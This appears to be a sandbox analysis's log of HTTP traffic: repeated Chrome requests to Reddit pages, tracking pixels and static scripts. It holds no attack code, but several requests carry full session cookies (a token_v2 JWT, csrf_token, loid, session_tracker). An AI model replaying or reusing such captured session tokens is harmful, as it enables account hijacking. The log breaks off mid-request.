token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /i.gif?za=pivK4e_bTj6r7quMXmq1Mqyf7J_f3AcE6rswCosMsot5GeXS7fxjYqLfjIMHRd0LURvkN02-AI9K8IO62sK3t9UUu5RnLZHUlLzHEKhuTuD4_tJaGvcqkzyJkCs4IGayNyLgsS7GuWDzQiWJqIn0uo_xpvpjY5kBkiGnjHK56G7TKmhlK11Qw8_99hENn_fmUjex3ODHNguCy2yBq18Bapxi1uzOsh3cC-eIZmPZfLU6SYbPSc9C&zp=cAHvjBuFx2hE-YA95JKxsyDBfQCKThlXz-_d79P85U31eCt1ohA5v97-QTpS07XUf0PPJSVWQmae3v_izRKv_BIjpsMLV46fwqjXCw1ekHnAcvB52BR3AJXx1Moukw&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344522919&t=1745344522919&o=0&q=0&h=0&w=0&sh=1024&sw=1280 HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /i.gif?za=9wK-CFOU7QjxkSNFKq6hjSLN3UlU_SlB4YaLjg0skm5UJzbwPUITopaRkomX6XYatxkN66Lz-Osx-RvAaLXDWtR4kppcowit64cI9uoTejfmsrJCgWFhzlN7u5F0zuceAgjege82sxWyPTYptp5oAMSwUDz4DmHnfORX5CDZNLBvvtb2KRTj47opjr_zohKB4UTnKBxr5r8iPHGEELeLYYgtC-56UWBPl-URVLPZR5JVNX_YNMe3PK-JW9nFqC9O36h0m4By_k_EvrPxr_9pSMUeOZYW0_Ap99rO_SrDhz8YHLIxu1WNcDDRVFQJ6dcHLsnD4x0xmQLuB7rmjTL5ODUuVsHfjThIxQTuQt9OvwvJSYFCCpLOBlBBH2D3-eyfyvJKmY-CkHRftONNJMD5y8g-N1LB27NjJ_4oIVxv7R40sfAK5Iarb5TVQG0h5jUFl7ES8D08Yp25uQ&zp=dUyFM7SX6w2VFnNJxlNG6peJXK_1whHay09v5NE86Vazpp2OMD1mlx7DbQ0WB54LVDUKj8NvItTQFtfdXyuTLZbfbSmlpfMKUL7QsPYaV8cGDCjaAFAWRIdneW2vnQ&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344528742&t=1745344528742&o=0&q=0&h=725&w=620&sh=1024&sw=1280&va=1&vb=0&vc=0&vd=0&ve=0&vg=0&vh=0&vi=0&vs=0&vt=0&vu=0&vv=0&vx=0&vw=0&vq=0&vr=0&vy=0&xe=0&vz=0&xa=0&xf=0&xb=0&vf=0&xc=0 HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgc
Source: global trafficHTTP traffic detected: GET /shreddit/assets/pix/ads/1.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/base-562ac292.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/search-results-dropdown-modifier-client-js-b0d36951.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/post-consume-tracker-e4186985.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/search-typeahead-expandable-section-1d8b2dde.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/search-params-246786c0.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/search-dynamic-id-564febdb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i.gif?za=U1PIwb8qAqaOqN1LQsbCbYhAlXBhPZMbqlxdM5vX9bL6nMfmxouVcYPPDCy3px7Et3tM3rkvhrHJq1hEUza0-bSWm0Ycy2MN4SjtYmQHQcMawNRGTP2RmG9QQ-fiz9pv7mDAiygmP6EldFgGLVZGI2Y9g5M1x2-4_6UxAdDsoaC481I4nTtoZxQyO-YZw8D7BPFC775SBb4SxmceSsVQjapRAI0uuasqKVLzxkiD9NQh7K6cNg2X&zp=4cXXzHWq3Vmjel5C_wCpiFjWkTGO24SmsZ4jxlw8X4KiluzbpXG8EVDDmCHRX5BcR7nQbrf6-BOuvRWZH3qkRHfyuc5sRcbbYRfO-19j-dsE0CZSBVns-0p670PvQA&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344522916&t=1745344522916&o=0&q=0&h=0&w=0&sh=1024&sw=1280 HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /shreddit/assets/pix/ads/1.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/styling-overrides/?context=namespaced HTTP/1.1Host: www.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/?rdt=54831Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/hls-29122692.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shreddit-player-2-c1d75db3.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i.gif?za=9wK-CFOU7QjxkSNFKq6hjSLN3UlU_SlB4YaLjg0skm5UJzbwPUITopaRkomX6XYatxkN66Lz-Osx-RvAaLXDWtR4kppcowit64cI9uoTejfmsrJCgWFhzlN7u5F0zuceAgjege82sxWyPTYptp5oAMSwUDz4DmHnfORX5CDZNLBvvtb2KRTj47opjr_zohKB4UTnKBxr5r8iPHGEELeLYYgtC-56UWBPl-URVLPZR5JVNX_YNMe3PK-JW9nFqC9O36h0m4By_k_EvrPxr_9pSMUeOZYW0_Ap99rO_SrDhz8YHLIxu1WNcDDRVFQJ6dcHLsnD4x0xmQLuB7rmjTL5ODUuVsHfjThIxQTuQt9OvwvJSYFCCpLOBlBBH2D3-eyfyvJKmY-CkHRftONNJMD5y8g-N1LB27NjJ_4oIVxv7R40sfAK5Iarb5TVQG0h5jUFl7ES8D08Yp25uQ&zp=dUyFM7SX6w2VFnNJxlNG6peJXK_1whHay09v5NE86Vazpp2OMD1mlx7DbQ0WB54LVDUKj8NvItTQFtfdXyuTLZbfbSmlpfMKUL7QsPYaV8cGDCjaAFAWRIdneW2vnQ&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344528742&t=1745344528742&o=0&q=0&h=725&w=620&sh=1024&sw=1280&va=1&vb=0&vc=0&vd=0&ve=0&vg=0&vh=0&vi=0&vs=0&vt=0&vu=0&vv=0&vx=0&vw=0&vq=0&vr=0&vy=0&xe=0&vz=0&xa=0&xf=0&xb=0&vf=0&xc=0 HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 